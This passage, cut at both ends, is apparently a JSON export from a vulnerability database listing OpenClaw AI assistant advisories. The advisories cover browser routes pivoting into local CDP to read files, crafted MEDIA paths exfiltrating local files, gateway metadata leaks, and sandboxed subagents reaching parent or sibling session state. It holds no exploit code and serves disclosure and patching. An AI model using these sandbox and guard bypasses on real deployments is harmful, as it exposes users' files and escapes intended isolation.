y":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-34504","GHSA-qxgf-hmcj-3xw3"],"risk_score":3.8,"exploitability":"0.5","weighted_severity":"7.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w2rd-2j4p-gfgw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89348?format=json","vulnerability_id":"VCID-w2tj-nqa6-cuam","summary":"OpenClaw: Browser interaction routes could pivot into local CDP and regain file reads\n## Summary\n\nBrowser interaction routes could pivot into local CDP and regain file reads.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nBrowser act/evaluate interactions could trigger navigation into the local CDP origin and then create or read disallowed `file://` pages despite direct navigation guards.\n\n## Technical Details\n\nThe fix re-checks browser URLs after interaction-driven navigations and blocks targets that violate the configured navigation policy.\n\n## Fix\n\nThe issue was fixed in #63226. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- PR: #63226\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63226","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63226"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38"},{"reference_url":"https://github.com/advisories/GHSA-qmwg-qprg-3j38","reference_id":"GHSA-qmwg-qprg-3j38","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qmwg-qprg-3j38"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110121?format=json","purl":"pkg:npm/openclaw@2026.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-k8x3-9pv7-rfax"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rvcq-rqbq-4khp"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"}],"aliases":["GHSA-qmwg-qprg-3j38"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w2tj-nqa6-cuam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89467?format=json","vulnerability_id":"VCID-w4p1-sxdg-hyha","summary":"OpenClaw: Shared reply MEDIA - paths are treated as trusted and can trigger cross-channel local file exfiltration\n## Impact\n\nShared reply MEDIA: paths are treated as trusted and can trigger cross-channel local file exfiltration.\n\nA crafted shared reply MEDIA reference could cause another channel to read a local file path as trusted generated media.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.4`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @threalwinky for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42424","reference_id":"","reference_type":"","scores":[{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.0867","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.0869","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08675","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42424"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42424","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42424"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths"},{"reference_url":"https://github.com/advisories/GHSA-qqq7-4hxc-x63c","reference_id":"GHSA-qqq7-4hxc-x63c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qqq7-4hxc-x63c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42424","GHSA-qqq7-4hxc-x63c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w4p1-sxdg-hyha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89489?format=json","vulnerability_id":"VCID-w58d-6veg-uugy","summary":"OpenClaw: Gateway hello snapshots exposed host config and state paths to non-admin clients\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gateway `connect` success snapshot exposed local `configPath` and `stateDir` metadata to non-admin clients. Low-privilege authenticated clients could learn host filesystem layout and deployment details that were not needed for their role.\n\n## Impact\n\nA non-admin client could recover host-specific filesystem paths and related deployment metadata, aiding host fingerprinting and chained attacks. This was an information-disclosure issue, not a direct authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `676b748056b5efca6f1255708e9dd9469edf5e2e` — limit connect snapshot metadata to admin-scoped clients\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @topsec-bunney for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41339","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11323","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11356","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11364","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41339"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41339","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41339"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot"},{"reference_url":"https://github.com/advisories/GHSA-2f7j-rp58-mr42","reference_id":"GHSA-2f7j-rp58-mr42","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2f7j-rp58-mr42"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41339","GHSA-2f7j-rp58-mr42"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w58d-6veg-uugy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90824?format=json","vulnerability_id":"VCID-w8sb-7ymy-wkez","summary":"`OpenClaw: session_status` let sandboxed subagents access parent or sibling session state\n### Summary\n\nThe built-in `session_status` tool did not enforce the intended session-visibility boundary. A sandboxed subagent could supply another session's `sessionKey` and inspect or modify state outside its own sandbox scope.\n\n### Impact\n\nThis allowed a sandboxed child session to read parent or sibling session data and, in affected releases, update the target session's persisted 